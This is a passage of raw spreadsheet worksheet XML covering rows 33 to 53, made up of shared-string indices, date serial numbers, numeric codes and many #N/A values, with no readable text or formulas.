        <v>104</v>
      </c>
      <c r="N33" s="1"/>
      <c r="O33" s="1" t="s">
        <v>1550</v>
      </c>
      <c r="P33" s="1"/>
      <c r="Q33" s="1" t="s">
        <v>3641</v>
      </c>
      <c r="R33" s="82">
        <v>445</v>
      </c>
      <c r="S33" s="82">
        <v>515</v>
      </c>
      <c r="T33" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U33" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V33" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W33" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="34" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A34" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B34" s="51">
        <v>44349.880223009262</v>
      </c>
      <c r="C34" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="D34" s="26">
        <v>310</v>
      </c>
      <c r="E34" s="1" t="s">
        <v>1547</v>
      </c>
      <c r="F34" s="26">
        <v>220</v>
      </c>
      <c r="G34" s="57" t="s">
        <v>1548</v>
      </c>
      <c r="H34" s="1" t="s">
        <v>1549</v>
      </c>
      <c r="I34" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J34" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K34" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L34" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M34" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N34" s="1"/>
      <c r="O34" s="1" t="s">
        <v>1550</v>
      </c>
      <c r="P34" s="1"/>
      <c r="Q34" s="1" t="s">
        <v>142</v>
      </c>
      <c r="R34" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S34" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T34" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U34" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V34" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W34" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="35" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A35" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B35" s="51">
        <v>43566.596766006944</v>
      </c>
      <c r="C35" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="D35" s="26">
        <v>110</v>
      </c>
      <c r="E35" s="1" t="s">
        <v>1551</v>
      </c>
      <c r="F35" s="26">
        <v>110</v>
      </c>
      <c r="G35" s="57" t="s">
        <v>1552</v>
      </c>
      <c r="H35" s="1" t="s">
        <v>1553</v>
      </c>
      <c r="I35" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J35" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K35" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L35" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M35" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N35" s="1"/>
      <c r="O35" s="1" t="s">
        <v>1554</v>
      </c>
      <c r="P35" s="1"/>
      <c r="Q35" s="1" t="s">
        <v>3640</v>
      </c>
      <c r="R35" s="82">
        <v>2358</v>
      </c>
      <c r="S35" s="82">
        <v>953</v>
      </c>
      <c r="T35" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U35" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V35" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W35" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="36" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A36" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B36" s="51">
        <v>44314.922637638891</v>
      </c>
      <c r="C36" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="D36" s="26">
        <v>231</v>
      </c>
      <c r="E36" s="1" t="s">
        <v>1551</v>
      </c>
      <c r="F36" s="26">
        <v>120</v>
      </c>
      <c r="G36" s="57" t="s">
        <v>1552</v>
      </c>
      <c r="H36" s="1" t="s">
        <v>1553</v>
      </c>
      <c r="I36" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J36" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K36" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L36" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M36" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N36" s="1"/>
      <c r="O36" s="1" t="s">
        <v>1554</v>
      </c>
      <c r="P36" s="1"/>
      <c r="Q36" s="1" t="s">
        <v>3641</v>
      </c>
      <c r="R36" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S36" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T36" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U36" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V36" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W36" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="37" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A37" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B37" s="51">
        <v>44314.922637638891</v>
      </c>
      <c r="C37" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="D37" s="26">
        <v>310</v>
      </c>
      <c r="E37" s="55" t="s">
        <v>1551</v>
      </c>
      <c r="F37" s="26">
        <v>200</v>
      </c>
      <c r="G37" s="57" t="s">
        <v>1552</v>
      </c>
      <c r="H37" s="1" t="s">
        <v>1553</v>
      </c>
      <c r="I37" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J37" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K37" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L37" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M37" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N37" s="1"/>
      <c r="O37" s="1" t="s">
        <v>1554</v>
      </c>
      <c r="P37" s="1"/>
      <c r="Q37" s="1" t="s">
        <v>142</v>
      </c>
      <c r="R37" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S37" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T37" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U37" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V37" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W37" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="38" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A38" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B38" s="51">
        <v>43566.596766030096</v>
      </c>
      <c r="C38" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="D38" s="26">
        <v>110</v>
      </c>
      <c r="E38" s="1" t="s">
        <v>1555</v>
      </c>
      <c r="F38" s="26">
        <v>110</v>
      </c>
      <c r="G38" s="57" t="s">
        <v>1556</v>
      </c>
      <c r="H38" s="1" t="s">
        <v>1557</v>
      </c>
      <c r="I38" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J38" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K38" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L38" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M38" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N38" s="1"/>
      <c r="O38" s="1" t="s">
        <v>1554</v>
      </c>
      <c r="P38" s="1"/>
      <c r="Q38" s="1" t="s">
        <v>3640</v>
      </c>
      <c r="R38" s="82">
        <v>1</v>
      </c>
      <c r="S38" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T38" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U38" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V38" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W38" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="39" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A39" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B39" s="51">
        <v>43566.596766030096</v>
      </c>
      <c r="C39" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="D39" s="26">
        <v>231</v>
      </c>
      <c r="E39" s="1" t="s">
        <v>1555</v>
      </c>
      <c r="F39" s="26">
        <v>110</v>
      </c>
      <c r="G39" s="57" t="s">
        <v>1556</v>
      </c>
      <c r="H39" s="1" t="s">
        <v>1557</v>
      </c>
      <c r="I39" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J39" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K39" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L39" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M39" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N39" s="1"/>
      <c r="O39" s="1" t="s">
        <v>1554</v>
      </c>
      <c r="P39" s="1"/>
      <c r="Q39" s="1" t="s">
        <v>3641</v>
      </c>
      <c r="R39" s="82">
        <v>1</v>
      </c>
      <c r="S39" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T39" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U39" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V39" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W39" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="40" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A40" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B40" s="51">
        <v>43566.596766030096</v>
      </c>
      <c r="C40" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="D40" s="26">
        <v>310</v>
      </c>
      <c r="E40" s="1" t="s">
        <v>1555</v>
      </c>
      <c r="F40" s="26">
        <v>110</v>
      </c>
      <c r="G40" s="57" t="s">
        <v>1556</v>
      </c>
      <c r="H40" s="1" t="s">
        <v>1557</v>
      </c>
      <c r="I40" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J40" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K40" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L40" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M40" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N40" s="1"/>
      <c r="O40" s="1" t="s">
        <v>1554</v>
      </c>
      <c r="P40" s="1"/>
      <c r="Q40" s="1" t="s">
        <v>142</v>
      </c>
      <c r="R40" s="82">
        <v>1</v>
      </c>
      <c r="S40" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T40" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U40" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V40" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W40" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="41" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A41" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B41" s="51">
        <v>44327.625929131944</v>
      </c>
      <c r="C41" s="1" t="s">
        <v>1739</v>
      </c>
      <c r="D41" s="26">
        <v>110</v>
      </c>
      <c r="E41" s="1" t="s">
        <v>1740</v>
      </c>
      <c r="F41" s="26">
        <v>110</v>
      </c>
      <c r="G41" s="57" t="s">
        <v>1741</v>
      </c>
      <c r="H41" s="1" t="s">
        <v>1742</v>
      </c>
      <c r="I41" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J41" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K41" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L41" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M41" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N41" s="1"/>
      <c r="O41" s="1" t="s">
        <v>1743</v>
      </c>
      <c r="P41" s="1"/>
      <c r="Q41" s="1" t="s">
        <v>3642</v>
      </c>
      <c r="R41" s="82">
        <v>672</v>
      </c>
      <c r="S41" s="82">
        <v>1</v>
      </c>
      <c r="T41" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U41" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V41" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W41" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="42" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A42" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B42" s="51">
        <v>44130.664220289349</v>
      </c>
      <c r="C42" s="1" t="s">
        <v>2320</v>
      </c>
      <c r="D42" s="26">
        <v>100</v>
      </c>
      <c r="E42" s="1" t="s">
        <v>2321</v>
      </c>
      <c r="F42" s="26">
        <v>100</v>
      </c>
      <c r="G42" s="57" t="s">
        <v>2322</v>
      </c>
      <c r="H42" s="1" t="s">
        <v>2323</v>
      </c>
      <c r="I42" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J42" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K42" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L42" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M42" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N42" s="1"/>
      <c r="O42" s="1" t="s">
        <v>2324</v>
      </c>
      <c r="P42" s="1"/>
      <c r="Q42" s="1" t="s">
        <v>142</v>
      </c>
      <c r="R42" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S42" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T42" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U42" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V42" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W42" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="43" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A43" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B43" s="51">
        <v>44061.968377083336</v>
      </c>
      <c r="C43" s="1" t="s">
        <v>2598</v>
      </c>
      <c r="D43" s="26">
        <v>114</v>
      </c>
      <c r="E43" s="1" t="s">
        <v>2974</v>
      </c>
      <c r="F43" s="26">
        <v>114</v>
      </c>
      <c r="G43" s="57" t="s">
        <v>2975</v>
      </c>
      <c r="H43" s="1" t="s">
        <v>2976</v>
      </c>
      <c r="I43" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J43" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K43" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L43" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M43" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N43" s="1"/>
      <c r="O43" s="1"/>
      <c r="P43" s="1"/>
      <c r="Q43" s="1" t="s">
        <v>3643</v>
      </c>
      <c r="R43" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S43" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T43" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U43" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V43" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W43" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="44" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A44" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B44" s="51">
        <v>43775.748652488423</v>
      </c>
      <c r="C44" s="1" t="s">
        <v>3280</v>
      </c>
      <c r="D44" s="26">
        <v>100</v>
      </c>
      <c r="E44" s="72" t="s">
        <v>3281</v>
      </c>
      <c r="F44" s="26">
        <v>100</v>
      </c>
      <c r="G44" s="57" t="s">
        <v>3282</v>
      </c>
      <c r="H44" s="1" t="s">
        <v>3283</v>
      </c>
      <c r="I44" s="1" t="s">
        <v>38</v>
      </c>
      <c r="J44" s="1" t="s">
        <v>38</v>
      </c>
      <c r="K44" s="1" t="s">
        <v>38</v>
      </c>
      <c r="L44" s="1" t="s">
        <v>38</v>
      </c>
      <c r="M44" s="1" t="s">
        <v>38</v>
      </c>
      <c r="N44" s="1" t="s">
        <v>38</v>
      </c>
      <c r="O44" s="1" t="s">
        <v>3284</v>
      </c>
      <c r="P44" s="1"/>
      <c r="Q44" s="1" t="s">
        <v>3644</v>
      </c>
      <c r="R44" s="82">
        <v>701</v>
      </c>
      <c r="S44" s="82">
        <v>736</v>
      </c>
      <c r="T44" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U44" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V44" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W44" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="45" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A45" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B45" s="51">
        <v>43775.748652476854</v>
      </c>
      <c r="C45" s="1" t="s">
        <v>3280</v>
      </c>
      <c r="D45" s="26">
        <v>100</v>
      </c>
      <c r="E45" s="72" t="s">
        <v>3286</v>
      </c>
      <c r="F45" s="26">
        <v>100</v>
      </c>
      <c r="G45" s="57" t="s">
        <v>3287</v>
      </c>
      <c r="H45" s="1" t="s">
        <v>3288</v>
      </c>
      <c r="I45" s="1" t="s">
        <v>38</v>
      </c>
      <c r="J45" s="1" t="s">
        <v>38</v>
      </c>
      <c r="K45" s="1" t="s">
        <v>38</v>
      </c>
      <c r="L45" s="1" t="s">
        <v>38</v>
      </c>
      <c r="M45" s="1" t="s">
        <v>38</v>
      </c>
      <c r="N45" s="1" t="s">
        <v>38</v>
      </c>
      <c r="O45" s="1" t="s">
        <v>3289</v>
      </c>
      <c r="P45" s="1"/>
      <c r="Q45" s="1" t="s">
        <v>3644</v>
      </c>
      <c r="R45" s="82">
        <v>282</v>
      </c>
      <c r="S45" s="82">
        <v>350</v>
      </c>
      <c r="T45" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U45" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V45" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W45" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="46" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A46" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B46" s="51">
        <v>44098.935999849535</v>
      </c>
      <c r="C46" s="1" t="s">
        <v>3348</v>
      </c>
      <c r="D46" s="26">
        <v>102</v>
      </c>
      <c r="E46" s="1" t="s">
        <v>3349</v>
      </c>
      <c r="F46" s="26">
        <v>102</v>
      </c>
      <c r="G46" s="57" t="s">
        <v>3350</v>
      </c>
      <c r="H46" s="1" t="s">
        <v>3351</v>
      </c>
      <c r="I46" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J46" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K46" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L46" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M46" s="1" t="s">
        <v>1766</v>
      </c>
      <c r="N46" s="1" t="s">
        <v>1767</v>
      </c>
      <c r="O46" s="1"/>
      <c r="P46" s="1" t="s">
        <v>604</v>
      </c>
      <c r="Q46" s="1" t="s">
        <v>3645</v>
      </c>
      <c r="R46" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S46" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T46" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U46" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V46" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W46" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="47" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A47" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B47" s="51">
        <v>44098.935999849535</v>
      </c>
      <c r="C47" s="1" t="s">
        <v>3348</v>
      </c>
      <c r="D47" s="26">
        <v>200</v>
      </c>
      <c r="E47" s="1" t="s">
        <v>3349</v>
      </c>
      <c r="F47" s="26">
        <v>200</v>
      </c>
      <c r="G47" s="57" t="s">
        <v>3350</v>
      </c>
      <c r="H47" s="1" t="s">
        <v>3351</v>
      </c>
      <c r="I47" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J47" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K47" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L47" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M47" s="1" t="s">
        <v>1766</v>
      </c>
      <c r="N47" s="1" t="s">
        <v>1767</v>
      </c>
      <c r="O47" s="1"/>
      <c r="P47" s="1" t="s">
        <v>604</v>
      </c>
      <c r="Q47" s="1" t="s">
        <v>3353</v>
      </c>
      <c r="R47" s="82">
        <v>11043</v>
      </c>
      <c r="S47" s="82">
        <v>10795</v>
      </c>
      <c r="T47" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U47" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V47" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W47" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="48" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A48" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B48" s="51">
        <v>44057.694567280094</v>
      </c>
      <c r="C48" s="1" t="s">
        <v>3374</v>
      </c>
      <c r="D48" s="26">
        <v>101</v>
      </c>
      <c r="E48" s="1" t="s">
        <v>3375</v>
      </c>
      <c r="F48" s="26">
        <v>100</v>
      </c>
      <c r="G48" s="57" t="s">
        <v>3376</v>
      </c>
      <c r="H48" s="1" t="s">
        <v>3377</v>
      </c>
      <c r="I48" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J48" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K48" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L48" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M48" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N48" s="1"/>
      <c r="O48" s="1" t="s">
        <v>3378</v>
      </c>
      <c r="P48" s="1"/>
      <c r="Q48" s="1" t="s">
        <v>3379</v>
      </c>
      <c r="R48" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S48" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T48" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U48" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V48" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W48" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="49" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A49" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B49" s="51">
        <v>43946.014389328702</v>
      </c>
      <c r="C49" s="1" t="s">
        <v>2075</v>
      </c>
      <c r="D49" s="26">
        <v>106</v>
      </c>
      <c r="E49" s="1" t="s">
        <v>2076</v>
      </c>
      <c r="F49" s="26">
        <v>106</v>
      </c>
      <c r="G49" s="57" t="s">
        <v>2077</v>
      </c>
      <c r="H49" s="1" t="s">
        <v>2078</v>
      </c>
      <c r="I49" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J49" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K49" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L49" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M49" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N49" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O49" s="1"/>
      <c r="P49" s="1" t="s">
        <v>802</v>
      </c>
      <c r="Q49" s="1" t="s">
        <v>3646</v>
      </c>
      <c r="R49" s="82">
        <v>18810</v>
      </c>
      <c r="S49" s="82">
        <v>19842</v>
      </c>
      <c r="T49" s="82">
        <v>404249</v>
      </c>
      <c r="U49" s="82">
        <v>597621</v>
      </c>
      <c r="V49" s="82">
        <v>676318</v>
      </c>
      <c r="W49" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="50" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A50" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B50" s="51">
        <v>43571.429527280095</v>
      </c>
      <c r="C50" s="1" t="s">
        <v>2081</v>
      </c>
      <c r="D50" s="26">
        <v>133</v>
      </c>
      <c r="E50" s="1" t="s">
        <v>2082</v>
      </c>
      <c r="F50" s="26">
        <v>103</v>
      </c>
      <c r="G50" s="57" t="s">
        <v>2083</v>
      </c>
      <c r="H50" s="1" t="s">
        <v>2084</v>
      </c>
      <c r="I50" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J50" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K50" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L50" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M50" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N50" s="1"/>
      <c r="O50" s="1"/>
      <c r="P50" s="1"/>
      <c r="Q50" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R50" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S50" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T50" s="82">
        <v>2622</v>
      </c>
      <c r="U50" s="82">
        <v>4318</v>
      </c>
      <c r="V50" s="82">
        <v>10034</v>
      </c>
      <c r="W50" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="51" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A51" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B51" s="51">
        <v>43663.590451458331</v>
      </c>
      <c r="C51" s="1" t="s">
        <v>2081</v>
      </c>
      <c r="D51" s="26">
        <v>133</v>
      </c>
      <c r="E51" s="1" t="s">
        <v>2086</v>
      </c>
      <c r="F51" s="26">
        <v>104</v>
      </c>
      <c r="G51" s="57" t="s">
        <v>2087</v>
      </c>
      <c r="H51" s="1" t="s">
        <v>2088</v>
      </c>
      <c r="I51" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J51" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K51" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L51" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M51" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N51" s="1"/>
      <c r="O51" s="1"/>
      <c r="P51" s="1"/>
      <c r="Q51" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R51" s="82">
        <v>6606</v>
      </c>
      <c r="S51" s="82">
        <v>7026</v>
      </c>
      <c r="T51" s="82">
        <v>190904</v>
      </c>
      <c r="U51" s="82">
        <v>220353</v>
      </c>
      <c r="V51" s="82">
        <v>175531</v>
      </c>
      <c r="W51" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="52" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A52" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B52" s="51">
        <v>43641.685261724539</v>
      </c>
      <c r="C52" s="1" t="s">
        <v>2081</v>
      </c>
      <c r="D52" s="26">
        <v>133</v>
      </c>
      <c r="E52" s="1" t="s">
        <v>2089</v>
      </c>
      <c r="F52" s="26">
        <v>100</v>
      </c>
      <c r="G52" s="57" t="s">
        <v>2090</v>
      </c>
      <c r="H52" s="1" t="s">
        <v>2091</v>
      </c>
      <c r="I52" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J52" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K52" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L52" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M52" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N52" s="1"/>
      <c r="O52" s="1"/>
      <c r="P52" s="1"/>
      <c r="Q52" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R52" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S52" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T52" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U52" s="82">
        <v>3</v>
      </c>
      <c r="V52" s="82">
        <v>6344</v>
      </c>
      <c r="W52" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="53" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A53" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B53" s="51">
        <v>43571.42952730324</v>
      </c>
      <c r="C53" s="1" t="s">
        <v>2081</v>
      </c>
      <c r="D53" s="26">
        <v>133</v>
      </c>
      <c r="E53" s="1" t="s">
        <v>2092</v>
      </c>
      <c r="F53" s="26">
        <v>103</v>
      </c>
      <c r="G53" s="57" t="s">
        <v>2093</v>
      </c>
      <c r="H53" s="1" t="s">
        <v>2094</v>
      </c>
      <c r="I53" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J53" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K53" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L53" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M53" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N53" s="1"/>
      <c r="O53" s="1"/>
      <c r="P53" s="1"/>
      <c r="Q53" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R53" s="82">
        <v>201067</v>
      </c>
      <c r="S53" s="82">
        <v>196888</v>
      </c>
      <c r="T53" s="82">
        <v>3711424</v>
      </c>
      <c r="U53" s="82">
        <v>5769894</v>
      </c>
      <c r="V53" s="82">
        <v>7026761</v>
      </c>
      <c r="W53" s="1" t="s">
